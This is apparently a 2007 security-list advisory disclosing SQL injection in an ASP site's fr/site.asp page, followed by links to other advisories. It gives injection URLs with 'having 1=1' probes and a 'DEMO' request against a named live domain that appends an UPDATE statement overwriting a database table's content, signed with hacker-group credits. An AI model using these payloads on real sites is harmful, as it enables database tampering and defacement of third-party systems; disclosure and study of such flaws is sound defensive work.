Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) Sphider Version 1.2.x (include_dir) file include Seir Anphin (file.php a[filepath]) Remote File Disclosure Vulnerability From:okan alp <codexploder_(at)_hotmail.com> Date:29.04.2007Subject:Actualite bulletins fr/site.asp SQL Injection Vulnerability ##################################################33 Credit : CodeXpLoder'tq mail : codexploder[at]hotmail[dot]com site : expw0rm.com greetz : BiyoSecurityTeam ------------------------------------------------------ 1) http://example.com/[patch]/site.asp?page=1=text=2= 1) http://example.com/fr/site.asp?page=evenement&nActualite=1&nAnnee=2006& nIDEvenement=1 having 1=1 ------------------------------------------------------ 2) http://example.com/[patch]/site.asp?page=1=2 2) http://example.com/fr/site.asp?page=formulaire&nIDFormulaire=1 having 1=1 ##########-DEMO-#################### # http://cldrc.qc.ca/fr/site.asp?page=evenement&nActualite=1&nAnnee=2006& nIDEvenement=1+update+TEvenement+set+ContenuEnEvenement='TEXT';-- ###################################################### // Exploit Worm www.expw0rm.com
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Sphider Version 1.2.x (include_dir) file include
Seir Anphin (file.php a[filepath]) Remote File Disclosure Vulnerability
